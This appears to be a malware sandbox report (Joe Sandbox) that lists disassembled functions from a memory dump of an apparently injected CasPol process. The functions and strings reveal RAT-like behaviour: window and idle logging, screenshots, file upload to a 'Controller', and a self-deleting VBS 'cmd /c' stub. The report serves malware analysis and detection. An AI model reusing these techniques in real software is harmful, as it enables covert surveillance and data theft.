_free.LIBCMT ref: 0044E680

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
Opcode Fuzzy Hash: 7e6f030d782122d9ed427149a34adee7b1511125a77e95644c9be5e40ed84895
Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99

Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A

Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5

Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
Sleep.KERNEL32(00000064), ref: 00412060

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

/stext ", xrefs: 00411D77, 00411E19, 00411EBB
HDG, xrefs: 004121F2
HDG, xrefs: 00412316
>G, xrefs: 0041227E
>G, xrefs: 00412132

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$HDG$HDG$>G$>G
API String ID: 1223786279-3931108886
Opcode ID: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
Opcode Fuzzy Hash: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A

Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
LoadLibraryA.KERNEL32(?), ref: 00413EC8
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
FreeLibrary.KERNEL32(00000000), ref: 00413EEF
LoadLibraryA.KERNEL32(?), ref: 00413F27
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
FreeLibrary.KERNEL32(00000000), ref: 00413F40
GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
FreeLibrary.KERNEL32(00000000), ref: 00413F66

Strings

\ws2_32, xrefs: 00413EB0
\wship6, xrefs: 00413F0F
freeaddrinfo, xrefs: 00413E63
getaddrinfo, xrefs: 00413E44, 00413EE2, 00413F33
getnameinfo, xrefs: 00413E53

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE

Function 0041B834 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
RegCloseKey.ADVAPI32(?), ref: 0041BB64

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B84C
Publisher, xrefs: 0041B8F6
UninstallString, xrefs: 0041B949
InstallLocation, xrefs: 0041B921
DisplayVersion, xrefs: 0041B90D
DisplayName, xrefs: 0041B8E1
InstallDate, xrefs: 0041B935

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
Opcode Fuzzy Hash: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A

Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040A456
Sleep.KERNEL32(000001F4), ref: 0040A461
GetForegroundWindow.USER32 ref: 0040A467
GetWindowTextLengthW.USER32(00000000), ref: 0040A470
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
Sleep.KERNEL32(000003E8), ref: 0040A574

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

], xrefs: 0040A508
4]G, xrefs: 0040A43B
4]G, xrefs: 0040A4AA
4]G, xrefs: 0040A4C0
[, xrefs: 0040A50E
minutes }, xrefs: 0040A59F
{ User has been idle for , xrefs: 0040A5AB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
API String ID: 911427763-1497357211
Opcode ID: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
Opcode Fuzzy Hash: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F

Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
GetCursorPos.USER32(?), ref: 0041CB08
SetForegroundWindow.USER32(?), ref: 0041CB11
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
ExitProcess.KERNEL32 ref: 0041CB84
CreatePopupMenu.USER32 ref: 0041CB8A
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F

Strings

Close, xrefs: 0041CB90

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18

Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444FBD
_free.LIBCMT ref: 00444FD3
_free.LIBCMT ref: 00444FE4
_free.LIBCMT ref: 00444FF5
_free.LIBCMT ref: 0044500C
GetCPInfo.KERNEL32(?,?), ref: 00445054

Part of subcall function 00451C2B: _free.LIBCMT ref: 00451C96

_free.LIBCMT ref: 00445200
_free.LIBCMT ref: 00445213
_free.LIBCMT ref: 00445221
_free.LIBCMT ref: 0044522C
_free.LIBCMT ref: 0044526E
_free.LIBCMT ref: 00445276
_free.LIBCMT ref: 0044527E
_free.LIBCMT ref: 00445286
_free.LIBCMT ref: 00445294

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64

Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
__aulldiv.LIBCMT ref: 00407FE9
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
CloseHandle.KERNEL32(00000000), ref: 00408200
CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
CloseHandle.KERNEL32(00000000), ref: 00408256

Strings

Uploading file to Controller: , xrefs: 00408077
ReadFile error, xrefs: 0040822E
SetFilePointerEx error, xrefs: 00408266
>G, xrefs: 00407E87

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
API String ID: 1884690901-3066803209
Opcode ID: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
Opcode Fuzzy Hash: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B

Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00409E62

Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049

Strings

@CG, xrefs: 00409F24
XCG, xrefs: 0040A029
xAG, xrefs: 00409E93
XCG, xrefs: 00409ECE
xAG, xrefs: 00409E83
@CG, xrefs: 00409F19

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: @CG$@CG$XCG$XCG$xAG$xAG
API String ID: 3795512280-3163867910
Opcode ID: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
Opcode Fuzzy Hash: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A

Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004500C1

Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8

_free.LIBCMT ref: 004500B6

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 004500D8
_free.LIBCMT ref: 004500ED
_free.LIBCMT ref: 004500F8
_free.LIBCMT ref: 0045011A
_free.LIBCMT ref: 0045012D
_free.LIBCMT ref: 0045013B
_free.LIBCMT ref: 00450146
_free.LIBCMT ref: 0045017E
_free.LIBCMT ref: 00450185
_free.LIBCMT ref: 004501A2
_free.LIBCMT ref: 004501BA

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719

Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041913D
GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
Sleep.KERNEL32(000003E8), ref: 0041927D
GetLocalTime.KERNEL32(?), ref: 0041928C
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00419223
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041921E, 00419239, 004192B0
XCG, xrefs: 0041924C
XCG, xrefs: 0041932E
XCG, xrefs: 0041919A

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-65789007
Opcode ID: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
Opcode Fuzzy Hash: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799

Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
ExitProcess.KERNEL32 ref: 0040C832

Strings

CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C7D5
.vbs, xrefs: 0040C6CD
Temp, xrefs: 0040C708
open, xrefs: 0040C820
exepath, xrefs: 0040C69F
""", 0, xrefs: 0040C74F
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C767
@CG, xrefs: 0040C67D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-390638927
Opcode ID: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
Opcode Fuzzy Hash: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99

Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F439
_free.LIBCMT ref: 0044F45D
_free.LIBCMT ref: 0044F46A
_free.LIBCMT ref: 0044F48F
_free.LIBCMT ref: 0044F49C
_free.LIBCMT ref: 0044F4A5
_free.LIBCMT ref: 0044F783
_free.LIBCMT ref: 0044F78B

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768

Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D

GetLastError.KERNEL32 ref: 00454AA6
__dosmaperr.LIBCMT ref: 00454AAD
GetFileType.KERNEL32(00000000), ref: 00454AB9
GetLastError.KERNEL32 ref: 00454AC3
__dosmaperr.LIBCMT ref: 00454ACC
CloseHandle.KERNEL32(00000000), ref: 00454AEC
CloseHandle.KERNEL32(?), ref: 00454C36
GetLastError.KERNEL32 ref: 00454C68
__dosmaperr.LIBCMT ref: 00454C6F

Strings

H, xrefs: 00454BF4

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A

Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

65535, xrefs: 00413C6A
udp, xrefs: 00413D17, 00413D1F, 00413D23

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E

Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
__dosmaperr.LIBCMT ref: 004393DD
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
__dosmaperr.LIBCMT ref: 0043941A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
__dosmaperr.LIBCMT ref: 0043946E
_free.LIBCMT ref: 0043947A
_free.LIBCMT ref: 00439481

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
Opcode Fuzzy Hash: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9

Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00404E71
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
TranslateMessage.USER32(?), ref: 00404F30
DispatchMessageA.USER32(?), ref: 00404F3B
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

DisplayMessage, xrefs: 00404F9E
GetMessage, xrefs: 00404FAA
CloseChat, xrefs: 00404FBB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
Opcode Fuzzy Hash: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A

Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
CloseHandle.KERNEL32(00000000), ref: 00416F2D
DeleteFileA.KERNEL32(00000000), ref: 00416F3C
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

<, xrefs: 00416ECB
@, xrefs: 00416ED2
@FG, xrefs: 00416F69
Temp, xrefs: 00416E48
@FG, xrefs: 00416EFD

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@$@FG$@FG$Temp
API String ID: 1107811701-2245803885
Opcode ID: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
